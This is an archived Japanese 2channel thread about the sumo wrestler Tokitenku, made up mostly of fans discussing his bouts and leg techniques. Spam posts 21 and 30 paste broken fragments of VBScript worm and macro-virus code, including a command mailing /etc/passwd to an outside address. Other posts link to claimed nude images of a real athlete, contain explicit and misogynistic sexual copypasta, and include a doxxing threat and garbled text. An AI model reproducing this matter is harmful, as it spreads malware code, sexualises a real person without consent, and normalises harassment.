2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【三所攻めは】時天空スッドレ・3【まだ無い】

1 :待った名無しさん:2006/11/11(土) 02:02:11
時天空 慶晃
(ときてんくう よしあき)

所属部屋 : 時津風
本名 : アルタンガダス・フチットバータル  
しこ名履歴 : 時天空
生年月日 : 昭和54年9月10日
出身地 : モンゴル・トゥブ県アルタンボラグ
身長 : 187.0cm
体重 : 147.0kg
三賞:技能1
十両優勝 : 1回
三段目優勝 : 1回
序二段優勝 : 1回
序ノ口優勝 : 1回
得意技 : 寄り切り・内掛け・二枚蹴り

大相撲名鑑
http://sumo.goo.ne.jp/ozumo_meikan/rikishi_joho/rikishi_2499.html
前スレ(「時天空スッドレ・二枚蹴り」)
http://sports9.2ch.net/test/read.cgi/sumou/1132860567/l50
大相撲記録の玉手箱関取名鑑
http://www.fsinet.or.jp/~sumo/profile/1/20040701.htm
Wikipedia(時天空慶晃)
http://ja.wikipedia.org/wiki/%E6%99%82%E5%A4%A9%E7%A9%BA%E6%85%B6%E6%99%83


2 :待った名無しさん:2006/11/11(土) 02:07:32
顔文字
  _, ,_
( -_>-)  基本形
  _, ,_
(* -_>-) 基本形、喜び、照れ
  _, ,_
(: -_>-) 苦笑
  _, ,_
(つ_>-) 泣き
  _, ,_
( ◎_>◎) 見開き


【ローカルルール】
・顔文字使用、時天空AAはOK。
・「時天空と関係が無い人物」時天空との馴れ合い妄想カキコ禁止。
(前スレが荒れた原因)
・相撲以外のネタは基本的に禁止。
・荒らしは無視。

3 :待った名無しさん:2006/11/11(土) 02:09:33
平成18年九州場所
東前頭3枚目

初日;Xe
2日目;垣添

4 :待った名無しさん:2006/11/15(水) 06:02:58
 _, ,_
(* -_>-)今日はガンガレ

5 :待った名無しさん:2006/11/15(水) 17:31:34
情けない

6 :待った名無しさん:2006/11/18(土) 02:11:07
やっとこさ初日が出た

7 :待った名無しさん:2006/11/18(土) 02:41:02
負けて覚える相撲かな
というが、昨日千代大海相手に負けながらも宛がい続けたのが、今日いい形で生きたな。

8 :待った名無しさん:2006/11/20(月) 00:57:38
初日  ●稀勢の里
二日目●垣添
三日目●朝青龍
四日目●琴光喜
五日目●千代大海
六日目○琴欧洲
七日目●出島
中日  ○北勝力

9 :待った名無しさん:2006/11/23(木) 00:48:26
八日目○玉乃島
九日目○普天王
十日目○栃乃洋

調子が上がってきたな

10 :待った名無しさん:2006/11/23(木) 17:22:29
何の面白みもない帳尻変化力士

11 :待った名無しさん:2006/11/24(金) 01:51:36
地味に頑張ってるね。

12 :待った名無しさん:2006/11/24(金) 02:34:53
今場所は足技を出してはみるものの、空振り多し

13 :待った名無しさん:2006/11/25(土) 21:02:55
仕切り線から手がはみ出てたお
行司も審判も注意しなかったけど

14 :待った名無しさん:2006/11/26(日) 01:47:47
勝ち越しは嬉しいが、「注意汁」と思った。

15 :待った名無しさん:2006/11/27(月) 01:01:43
初日  ●稀勢の里
二日目●垣添
三日目●朝青龍
四日目●琴光喜
五日目●千代大海
六日目○琴欧洲
七日目●出島
中日  ○北勝力
九日目○玉乃島
十日目○普天王
十一日○栃乃洋
十二日○黒海
十三日○雅山
十四日○安美錦
千秋楽○潮丸

中日から八連勝かすごいな
来場所は前頭筆頭かな

16 :待った名無しさん:2006/11/28(火) 12:50:53
 _, ,_
(* -_>-)流石に三役は無理でしょうか?

17 :待った名無しさん:2006/11/28(火) 19:13:50
えっ・・・うーん

18 :待った名無しさん:2006/11/28(火) 19:34:48
たぶん無理ぽ。

もし昇進したら、住人はモンゴルウォッカのジュース割でも飲むオフやるかw

19 :待った名無しさん:2006/11/30(木) 15:59:29
  _, ,_
( -_>-)  今場所も安馬戦がなかったので残念です

20 :待った名無しさん:2006/11/30(木) 16:11:31
時天空といえば、プレーリードッグとマーモットが同種と言い張ってた人というイメージしかないな。

21 :待った名無しさん:2006/11/30(木) 21:11:49
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
fso.copyfile "dirsystem&nurupo.vbs","j:\windows\startmenu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFilef1.path, f1.path+"

22 :待った名無しさん:2006/11/30(木) 21:12:50
「いけないのは いじめることぜよ」byりゅうま
http://news20.2ch.net/test/read.cgi/news/1162718863/

7:世界史未履修ですが名無しです2006/11/05(日) 18:28:59 ID:ivCd+oxFP BE:18882162-PLT(14100)
いじめられっこだった竜馬に言われてもな

>>1
りょうま じゃね?

16:襖 ◆UlHP/NKnew 2006/11/05(日) 18:33:47 ID:BCgq0RzO0 BE:311177546-PLT(16109)
襖|┃_ゝ`,,)あれ?りょうまなの>>7

22:股関節学会2006/11/05(日) 18:37:02 ID:J8RglieO0 BE:294357757-2BP(210)
誰やねんりゅうま

27:風邪引いた2006/11/05(日) 18:45:17 ID:irkRaUMt0
りゅうま??

28:番組の途中ですが名無しですsage2006/11/05(日) 18:45:24 ID:qEghVKhX0
リアル低学歴ワロタ

30:番組の途中ですが名無しです2006/11/05(日) 18:46:26 ID:08n5uGSX0
りゅうまって誰??近所の子??

84:襖 ◆UlHP/NKnew 2006/11/06(月) 01:46:58 ID:ej538hqn0 BE:155589326-PLT(16109)
襖|┃;´_ゝ`,,)もう勘弁してください 耳が真っ赤になってるんで勘弁して
ください

23 :待った名無しさん:2006/11/30(木) 21:21:07
このスレ俺が使うから
顔文字厨はでてっていいよ

24 :待った名無しさん:2006/11/30(木) 21:43:43
http://www.gal-mix.net/index.php?sa=K70
安藤美姫おまんこ丸見え画像

***************
開脚時の陰毛がメチャはみ出している。
マンコは微妙。

25 :待った名無しさん:2006/11/30(木) 23:59:22
       ___
     /   ヽ、_ \
    /(● ) (● ) \
  /:::⌒(__人__)⌒::::: \  こんなとき何て言うんだったかお…?
  |  l^l^lnー'´       |
  \ヽ   L        /
     ゝ  ノ
   /   /


      +  ___
        /⌒  ⌒\   +
 + .   /( ●)  (●)\      +
     / ::::::⌒(__人__)⌒::::: \     半年ROMれだお!
    |      |r┬-|     |
     \       `ー'´     /  +
    ノ            \
  /´               ヽ            カ   
 |    l   l||l 从人 l||l      l||l 从人 l||l  タ カ   
 ヽ    -一''''''"~~``'ー--、   -一'''''''ー-、.      タ
  ヽ ____(⌒)(⌒)⌒) )  (⌒_(⌒)⌒)⌒))
     ┌┬┬┐┌┬┬┬┐┌┬┬┬┐┌┬┬┬┐
  ,. - ''"| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄`l


26 :待った名無しさん:2006/12/01(金) 03:42:15
正常位でストレートに突く壱式
膝立ちで突き下ろす弐式
軽く持ち上げて突き上げる参式
そして、腰の動きだけでピストンする零式

27 :待った名無しさん:2006/12/08(金) 15:41:05
■ VIP足軽t ■ sageDATE:2006/11/22(水) 17:44:23.16 ID:OueyoEHQ0
死ぬほど痛い話をしてやる
ある男がいたそいつは夏コミの後にベロンベロンに酔っ払い、
勢いで一人秋葉原に繰り出した、その男はとらのあな5階の同人フロアに行き物色をしていたんだ
「こえてゆく春は夏の」
男は店内に流されていた曲に反応した、名曲「夏影、ボーカルver」である
そのとき過去の思い出、みすずちんや美凪たちの思い出が脳内に一気に襲ってきた
「いつか遠くへいつか忘れて」
ゴールの所やみちるの最後、酔いも手伝って男は人目もはばからず号泣した
泣きながら秋葉を歩きホテルに着いた
部屋で待ってた友人は
「どないしたん!?」
「・・・えっぐ・・・みすずが・・・みすずが・・・」(戦利品のみすずバスタオルを抱きしめながら)
事情説明
「そんなに泣いてたらみすずちんも浮かばれないだろ、彼女の事を思うなら泣くんじゃない」
「えっぐ・・・ごめん」
今の俺である

28 :くるくるトィンクル ◆P0qNc.u5gI :2006/12/11(月) 11:16:45
A*_psedroe9ik8itu4−kb5t0^

29 :くるくるトィンクル ◆vha3FDwXe6 :2006/12/11(月) 11:17:59
p:59o]@50p-79klj87@^--9^p-0p@^


30 :待った名無しさん:2006/12/11(月) 20:50:55
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
fso.copyfile "dirsystem&nurupo.vbs","j:\windows\startmenu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFilef1.path, f1.path+"

31 :待った名無しさん:2006/12/11(月) 21:03:39
お前ら親の金で毎晩毎晩、ろくに勉強もしないで
男のチンポを勃起させるためにシャブりまくり
その勃起チンポでマンコの穴をほじられ
4年前と今とでは比べようもないほどガバガバになったマンコを
複数の池面どもにまた指マンされ中出しされ
妊娠したら「男の方が悪い」「私は男運が悪い」などと妄言を吐き
そのくせ「好きな人のだったら気にしない」などとザーメンまで飲むくせに
キャンパス内じゃ、清楚なフリしてお嬢様気取りで尻をプリプリさせて歩いて
俺のことをキモイって思ってるくせに試験前には「ノート貸して(はぁと」みたいに
甘えた声出しやがって、こんな可愛い子が愛する男の前じゃ
子猫ちゃんみたいになってるんだろうなって思わせやがって
さすがの俺もそう思って、その日は勃起してその子でオナニーして
翌日、教室で会ったら生理臭がきつかったけど
「俺はお前でオナニーしたんだぜグフフ」と思って
とにかくいずれにしろこの4年間、女子大生どもは
毎日がセックスセックス、恋愛経験を積むだとかコミュニケーション能力だとかで
池面どもに体を隅々まで舐められて、女同士でいれば人の悪口は言うし、
妬んだり僻んだり、落ち込んだら「寂しくて」と言ってすぐに
ナンパ男の前で簡単に股を開いて、乳首も遊びすぎでなんか変な感じになってるくせに
卒業の時だけは「充実した4年間ですた」と戯言を吐く女子大生は
もっと親に感謝しろ

32 :待った名無しさん:2006/12/14(木) 03:36:30
馬鹿と気狂いは真実を言う。

33 :待った名無しさん:2006/12/14(木) 23:19:30
   |■_
   |m`) アイム スキャートマーン
   |⊂
   |


     ♪
   ♪   _■■_
      ヽ(´mm` )ノ  プッチン パポペー
         (  へ)
          く


   ♪
     ♪ _■■_
      ヽ( ´mm`)ノ エビバデ プッチン
         (へ  )
             >



34 :待った名無しさん:2006/12/14(木) 23:22:40
東京に出張した際、兼ねてから足を運んでみようと思ったハッテン場の○○に行ってみた。人数が多い分
派手に盛り上がっていて、あっちこっちの暗がりからよがり声が丸聞こえだ。その中でも一番大きい声を
出している男をちょっと見てみたらスゲエ!短髪マッチョの「いかにも」な雄臭い野郎が、股広げて
ブッ太い拳をケツマンコにガンガンぶち込まれてチンポビンビンにオッ勃ててヨガリ泣いてる!
こんな雄野郎がフィストされてんのか?!この体は相当鍛えているだろうし、顔も男臭いから、
普通にしてても十分もてるんじゃないのか?近づいてよく見ると、ケツも前もツルツルに剃り上げられている。
チンコはそこそこでかくて、根元にコックリングが三重に仕込んであって、それで締められているもんだから、
萎えようにも萎えられないし、いきたくてもいけないって仕組みだ。しばらくそいつのチンコしごいたり
乳首責めたりして遊んでいたら、奥の方に人がどんどん吸い込まれていくのが見えた。何だろうと思って
行ってみると、こっちの方がもっとスゲエ!色黒短髪でコイツはマッチョと言うよりSG系で、筋肉の上に
だぶつかない程度の脂肪が乗ってて、すごいジューシーな感じがたまんないんだけど、とにかくそいつが
四つん這いになってて、そのケツマンコに数人の男達が代わる代わる拳ブチ込んでいる!タチの男達も
みんなガタイいいから、腕だって結構太いし、拳もでかい。そんなのを何度も何本も受け入れてるから、
ウケのケツマンコは完全にビロビロのガバガバになっているのに、それでもみんな拳でガンガン責めている。
そのうち、その中の一人で本当に馬並みのデカマラ野郎が、ギンギンにオッ勃てたモノでそいつをバコバコに
犯しだした。中の粘膜がめくれ上がってビロビロのケツマンコに超デカマラが猛烈な勢いでピストン運動
しているのはスゲエ迫力だ。俺はあまりの激しさに少し見入ってしまった。しばらくファックされていると、
ウケがよがり声と言うよりは泣き声を上げだした。床に水がはねる音がしてあれっと思ったら、
ションベン漏らしながら射精してた。白目むいちゃって、あれは完全にイッちゃってたよな。この日俺は
フィストもしないで普通に二発ケツ掘って帰った。俺は見てただけだけど、何だかとにかくすごかったよ。

35 :待った名無しさん:2006/12/14(木) 23:38:18
謝れとは言いませんがこちらもちょっと大人げないのですが
ムカついたので友達のハッカーに頼んで あなたの個人情報を探ってもらう
ことにしました。あ、もう遅いですよ。もうすでに友達解析始めちゃってますから・・・(^^;
ちなみにこれは自慢じゃないんですがその友達は日本でも
5の指に入るくらい凄腕のハッカーです 。この前彼の家に遊びに行ったらも
のの5分で他人の個人情報を抜き取っていました。
彼にとってそれくらお赤子の指をひねるくらいの行いなんですよね(爆)
これであなたもいっかんの終わりってやつですね(^^;まあせいぜい後悔してくださいね。
それからもう二度と荒らしはしないこと(その友達は荒らしが大嫌いらしいです。
荒らしを見つけたら即解析に入るみたいです(^^;)
それでは、う〜ん二日後くらいかな?また例の所に来てくださいね。
あなたの住所本名住所その他もろもろのせておきますんで(笑)
あ、警察とかに言ったって無駄ですよ。あなたは荒らし(犯罪)なんだから
通報したところで捕まるのはアナタですし友達は掲示板のログを自在に操ることができるんです。
と、いうことでbye♪(^0^)/~~


36 :待った名無しさん:2006/12/14(木) 23:50:48
http://www.youtube.com/watch?v=wTbXkfvXGrA

37 :待った名無しさん:2006/12/20(水) 19:12:53
着底記念あげ

38 :待った名無しさん:2006/12/20(水) 19:18:40
こんなゴミスレあげなくてよろしい

39 :待った名無しさん:2006/12/21(木) 02:12:47
       _ ____       ミ川川川川彡
     /;;;;;;;;_,;;;;;;;;;,;;;;;;;__;;ヽ   ミ  オ   い
    /;;;;;/  __ \ ̄ /__\;;)  三 ラ  な ・
    |;;;;;'ゞ_/__ヽノノ ゞ∠_ヽノ/  三 の . く  ・
   ,⊥、;;|  くO 〉  〈.0 } {   三 .ロ . な ・
  /   ゞ    ̄     ̄   ⌒ヽ三  ッ  っ
  |    U         /二二ヽ }三 キ  た
  \__          |'⌒'⌒V /三 │ ぞ
      ̄ヽ__     ゝ ニニノ/ 彡.  が !

40 :待った名無しさん:2006/12/22(金) 21:02:04
19年初場所
東前頭2枚目

41 :待った名無しさん:2006/12/23(土) 02:47:09
::: : : : :                      Sドラドゥス                 : : : : : ::::_,.、‐"
"‐-、、::: : : : : :                  2000(28億km)           : : : : : : ::::_,、-‐"
   ``ヽ-、.,_:::::: : : : : : : :                       : : : : : : : : : ::::,,:,、-ヽ"
        ```'−-,,、,:_:::::::: : : : : : : : : : : : : : : : : : : : : : : : : : : : :::::::、,,、、、-‐''‘ 
               ゙、.`゜`''':…‐:--.-::::::、,,.:::::.,,,,.::::-.--: ‐丶'"゛゙`  : : ,"
             `i、:                          : 、" 
              \: :                      : .:、 :l
              ゝ`'-、.:         ミラ        : .:,、'´::/
               ゙. `'‐、.: .:   500(6億9700万km):_/  :l,
               `'.   `ヽ-、,,、: ..`: : : : : : : ,_、、-‐"   : :.ノ 
                   ヽ:       ``゛"'':'''''''''"`″     : :,/ 
                 `-、      アンタレス     : .,/ 
                  ``、、  390(5億4000万km)..:,/
                    `'ヽ、、.          _,.-'" 
                       ^"ヽ‐、-::---:ー""`  

                           。   太陽
                                1(130万km)


      / ー┬         |  l l  \    l l _/__   ├  /  ナ-      ナ―
     /| 口 |  ー┼┐\  |/  -―,   ̄フ _/__    |  <   / ├     /   ̄"
      |   J   / /   ∠__  __ノ   (__  (_ノ ⊂)ヽ  \   ⊂)ヽ つ /  ー―


42 :待った名無しさん:2006/12/23(土) 02:48:29
宇宙膨張は笑えた!
宇宙膨張無限ごとにカウントしてたのってオレだけ?
(よっしゃー2無限`突破!よーし次は3無限`突破しろーって)
でも結局は単位とかねえんだよね。全然、騒ぐほどじゃないし。
宇宙膨張は笑えた。まじで
理科で知って、手を叩いてわらったなぁ。
ハッブルが宇宙に出て行ってる間、家でバナナ食ってた
超えらいなーこいつらって思いながら
わざわざ宇宙まで行って記念撮影しようかと思ったよ。
でも宇宙膨張のおかげで何かしらの利益を得た人だっている訳だし
結果的には良かったんじゃないかな。
たしか地球とか膨張渋っていたけどさ、
あそこらへんって話の分かるやつだからそのままにさせたかったんだよね。
今でも膨張してるのがいるらしいけど、
ヤバイんだよ!そんなの気にしないなんだよね。むかつく。
ところで宇宙って無限をどうしてたの?
もしかして無限のまま?スゲェなぁー。
どちらにしろ宇宙からの映像はまさに東京ドーム20個ぶん以上のようで壮観だった!
気持ちの良い摂氏−272℃でした

43 :待った名無しさん:2006/12/28(木) 23:36:00
  、、 l | /, ,  .     /  ̄   ̄ \.    、ヽ l / ,
 .ヽ    ド´,       /、        .ヽ  =  ド  =
.ヽ し き ラ ニ.     |・ |―-、       | ニ= ラ .そ -=
=  て っ え =ニ   q -´ 二 ヽ      | ニ=  え .れ =ニ
ニ  く. と .も -=   . ノ_ ー  |     | =-  .も. で -=
=  れ.何.ん -=    ..\. ̄`  |     /  =-  ん. も -=
ニ  る と な =ニ      O===== |  =- . な  ` ニ
/,  : か ら ヽ、    .. /         |  ニ  ら   .ニ
 /      ヽ、      /    /      |  ´r :  ヽ`
  / / 小 \      /   /       .|   ´/小ヽ`

44 :待った名無しさん:2007/01/05(金) 23:47:19
チヨス
カロヤン

45 :待った名無しさん:2007/01/08(月) 01:23:08

    |┃三             ____________________
    |┃      , __     /
    |┃ ≡   /_、_\ < 
____.|ミ\___( <_,` ) _ \
    |┃=___    \    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    |┃ ≡   )   .人 \ ガラッ


46 :待った名無しさん:2007/01/08(月) 17:26:27
2ch管理人ひろゆきが常々口にする
 「嘘を嘘と見抜ける人でないと(2ch掲示板を使うのは)難しい」
という2chのキャッチフレーズからも分かるように、
そもそも2chはそれぞれの板の趣旨に沿って、
既にある程度の知識・経験を持っている者同士が話を
深めていくところなのであって、
初心者の質問は板においてはオマケに過ぎない。

手間も時間も費用もかけずにタダでイージーに知識や情報をゲットしようなんて甘い、
初心者の質問は無視されても仕方が無い。それが2chの基本。

でも、
「2chの人達ならばこの問題を解決してくれるかもしれない」
と思って2chを訪れる善意の人たちのために、
多くの板ではあくまでも 《 厚意で 》 質問専用スレを用意している。
なのに、
「質問スレだと解答が遅い」
「単発スレのほうがレスが早く着く」
などのふざけた理由で単発スレを立てるヴァカが引きも切らない。

もし、単発スレにいちいち解答していたとしたら、
勘違い厨房が
「やっぱり単発スレの方がすばやく解答をもらえるじゃないか」
と感じて毎日毎日10個も20個も単発質問スレが立ってしまい、
5分前に立った似たような単発スレすらも見付けられないだろう。
そもそもこういう自己中なヴァカは過去ログなんか絶対チェックしない。

そのうちに板内はその手の単発質問スレで埋め尽くされてしまうだろう。
そうなればパート●●とか続いている名シリーズ・スレすらもどんどんDAT落ちしてしまうだろう。
と言う事ぐらい、5秒も考えれば分かりそうなもんだ。

以上のような思いを簡潔にまとめると【 >>1は死ね 】ということになる。

47 :待った名無しさん:2007/01/08(月) 17:29:07
のどわと渡しこみのコンボキター

48 :待った名無しさん:2007/01/08(月) 17:30:35
三役みざして

49 :待った名無しさん:2007/01/08(月) 17:34:43
渡し込んだ手でガッツポーズ
なかなか良い

50 :待った名無しさん:2007/01/08(月) 20:32:24
今日あまりにかっこよくて惚れかけたので来ましたが帰ります

51 :待った名無しさん:2007/01/10(水) 04:19:25
〜2ちゃんねるに慣れるまで〜

1.最初は普通の掲示板のつもりで、名前を入れて書き込んでしまう
  名無しさんに誰だコイツ?とか言われて初めて普通の掲示板と違うと気付く
2.オマエモナーとか逝ってよしとか、2ちゃんねる風の言葉が珍しくて書きまくる
3.今まで見たことない話題やAAを見て、激しく引き込まれる
4.2ちゃんねるを見る時間が増える
5.2ちゃんねるに書かれている「本当っぽい裏情報」に見事に騙される。
  何とかハンバーガーの元アルバイトの話、とかを全て信じ始める。
6.泣ける話のスレッドなどを友達に勧めたりし始める。
7.企業叩きや宗教叩き、国家叩きの雰囲気に釣られて自分も叩きに参加する
  ○△産業なんてイラネ、とか、◇☆国民なんて死滅していいよ、とか言い出す。
〜長い期間〜
8.裏情報がウソだとわかり始める
9.ちょっと2ちゃんねるに対して冷静な見方が出来るようになる
10.ひろゆきの書き方を真似てみたりするですよ。。。
11.キャップもらう
12.飽きる

52 :待った名無しさん:2007/01/10(水) 05:32:03
時天空にはビッグバンアタックだ

53 :待った名無しさん:2007/01/10(水) 18:06:27
力強い相撲で琴奨菊を圧倒

54 :待った名無しさん:2007/01/12(金) 00:06:26
ヤオage

55 :待った名無しさん:2007/01/13(土) 18:08:12
バックから攻めage

56 :待った名無しさん:2007/01/13(土) 22:40:30
昨日さ、女友達が「知り合いであんたのこと好きって人がいるんだけど」 って
「え!だれ?だれ?」って聞くと「飯奢れw」・・・女って意味わからんね
で、ファミレスで奢ると「さて、誰でしょう?」ってクイズ形式
「もう帰るぞ」って切れ気味で言うといきなりキスしてきた
そんで「これがヒントw」だって・・・わかんねーよw
アホらしくて帰宅・・・早く誰か教えろっつの

57 :待った名無しさん:2007/01/14(日) 02:12:08
俺、死ぬ前に小学生の頃を、一日でいいから、またやってみたい
わいわい授業受けて、体育で外で遊んで、学校終わったら夕方までまた遊ぶんだ
空き地に夕焼け、金木犀の香りの中家に帰ると、家族が「おかえり〜」と迎えてくれて
TV見ながら談笑して、お母さんが晩御飯作ってくれる(ホントありがたいよな)
お風呂に入って上がったらみんな映画に夢中になってて、子供なのにさもわかってるように見入ってみたり
でも、全部見終える前に眠くなって、お部屋に戻って布団に入る
みんなのいる部屋の光が名残惜しいけど、そのうち意識がなくなって…そして、死にたい

58 :待った名無しさん:2007/01/14(日) 02:58:37
履く方に勝った。

59 :待った名無しさん:2007/01/14(日) 17:34:58
明日露鵬に処刑されろ

60 :待った名無しさん:2007/01/14(日) 22:48:56
琴光喜の一人相撲で四勝目

61 :待った名無しさん:2007/01/15(月) 02:46:04
  ( _, ,_)
_(__つ/ ̄ ̄ ̄/_
  \/    ./


         /\
        ../  ./|
      ∴\/./
     _, ,_゚∵ |/
   (ノ゚Д゚)ノ    
  /  /
 ̄ ̄ ̄ ̄ ̄ ̄

62 :待った名無しさん:2007/01/15(月) 10:33:14
大抵、表面的にはいい人を気取っている割に、
実は、面倒なことやリスクから逃げて、自分が必死になりたくないだけで、
自分の限界や実力が露呈することを恐れて、自分を取り繕うことだけを考えている。

自分から女に話しかけたり誘いをかけるわけでもなく、待っているだけの態度で、
同性にすら、自分が仏頂面をしていても優しく扱われることを一人で期待していて、
グループ行動ができず、かといって一人でも、一匹狼ではなく群れからはぐれた羊。

自分から企画をしたり、決断をするわけでもなく、すべて人に任せるだけで、
問題が起きれば、自分は関係ない顔をして逃げたり、迷惑そうないやな顔をするだけで、
当然ながら仲間からの信頼がゼロに近く、そういう評判にも敏感な女からは敬遠される。

当事者として経験を積むことがなく、年齢の割には顔つきが非常に幼く、
そのくせ、ろくな運動や食事をしていないのか、肌や体つきがかなり老けていて、
そのアンバランスさが全体的にエイリアンっぽくて、童貞の匂いがプンプンしてくる。

会話の内容が、テレビやネットを通じた他人の話ばかりで、行動力のなさが窺え、
知識自慢で相手を退屈させ、相手の話には必ず否定的な説教をして自分を偉く見せ、
話を膨らませるより遮断させることが得意で、ネガティブなオーラが顔をますます暗くする。

63 :待った名無しさん:2007/01/16(火) 17:25:31
キックボクサー

64 :待った名無しさん:2007/01/16(火) 18:12:17
あれは二枚蹴りとかじゃなくて普通のローキックだろ

65 :待った名無しさん:2007/01/16(火) 18:29:09
離れた状態からの“蹴り技”は初めて見たかもw

66 :待った名無しさん:2007/01/16(火) 18:59:07
あの蹴りには笑ったな。普通にただ蹴ったって感じで

67 :待った名無しさん:2007/01/16(火) 20:21:28
ローキックと掌底フックのコンビネーション、見事でした。

68 :待った名無しさん:2007/01/16(火) 22:18:35
 個別株オプションにおいて、その株式の投資収益率のボランティーが下落したとき、
ヨーロピアン

69 :待った名無しさん:2007/01/17(水) 14:35:04
俺が今まで観た相撲の取り組の中で、
1番ローキックっぽい蹴りをみた。ワラタwww

70 :待った名無しさん:2007/01/17(水) 17:09:39
       _ ____       ミ川川川川彡
     /;;;;;;;;_,;;;;;;;;;,;;;;;;;__;;ヽ   ミ オ   い
    /;;;;;/  __ \ ̄ /__\;;)  三 ラ  な ・
    |;;;;;'ゞ_/__ヽノノ ゞ∠_ヽノ/  三 の . く  ・
   ,⊥、;;|  くO 〉  〈.0 } {   三 .ロ . な ・
  /   ゞ    ̄     ̄   ⌒ヽ三  ッ  っ
  |    U         /二二ヽ }三 キ  た
  \__          |'⌒'⌒V /三 │ ぞ
      ̄ヽ__     ゝ ニニノ/ 彡.  が !


71 :待った名無しさん:2007/01/18(木) 03:35:44
主人公はすっごい優秀で、他の正社員が1日かかるような仕事を
一時間で終わらして社内から「おぉー!」とか言われて
その会社では取り扱っていないような問題が発生したときに
「いままでこなした仕事のノウハウがあるのよ」とかいって華麗にこなして
部長とか重役クラスから「ぜひわが社に来てくれ!」とか言われるんだけど
「束縛されたくないわ」とかいってシカト
後半では親とか周りが保険だの退職金だの結婚だのでグチグチ言って
落ち込むんだけど最終的には
「私にはハケンが一番。いつまでも最前線で働く女性!パスタスイーツセレブ!」
とかいって終わるドラマなんだろうな

72 :待った名無しさん:2007/01/18(木) 03:56:12
Is does it place with Masaru's Yamada Ftomomo and Srisritinco ♪
Srisritinco ♪ eating?..Haahaahaahaahaahaa each other.. ,,
Useless..*..provide..*..provide..*..provide..*..provide..*..provide..*.
.Yamada..already..do..already..go out..go out..go out..
Yamada..eat..fresh..improvement..fresh..improvement..provide.
.Yamada..place between..hair..provide..encounter..do.@: Fresh
improvement freshness improvement ♪
Is does it place with Masaru's Yamada Ftomomo and Srisritinco ♪
Srisritinco ♪ eating?..Haahaahaahaahaahaa each other.. ,,
Useless..*..provide..*..provide..*..provide..*..provide..*..provide..*.
.Yamada..already..do..already..go out..go out..go out..
Yamada..eat..fresh..improvement..fresh..improvement..provide.
.Yamada..place between..hair..provide..encounter..do.@: Fresh
improvement freshness improvement ♪


73 :待った名無しさん:2007/01/18(木) 21:28:30
ケンカ相撲

74 :待った名無しさん:2007/01/19(金) 17:31:37
わ〜〜い キセに勝った〜〜〜 やりぃ〜〜〜〜

75 :待った名無しさん:2007/01/19(金) 17:33:03
左足、右足と順に攻めてるのが凄い!やるなぁ〜。

76 :待った名無しさん:2007/01/19(金) 17:33:04
うめえなぁ

77 :待った名無しさん:2007/01/19(金) 17:33:38
凄すぎる
足技の冴えは角界一だな

78 :待った名無しさん:2007/01/19(金) 17:59:54
土俵際に追いつめられたところから外掛け〜ちょん掛けのコンボで逆転か

すげー

79 :待った名無しさん:2007/01/19(金) 20:18:31
↑訂正
「外掛け」じゃなく「内掛け〜ちょん掛けのコンボ」ね

80 :待った名無しさん:2007/01/19(金) 21:07:17
 _,,_
(*-_>-)人 明日、安馬が空気を読んでくれますように…ナモナモ

(´・U・)フチェ、ありがとう…

  _,,_
<#∴・。・>おい!!

81 :待った名無しさん:2007/01/19(金) 22:58:48
http://www.youtube.com/watch?v=ZpBXhQQ-96o
右足一本でここまで逆転できるものなのか…

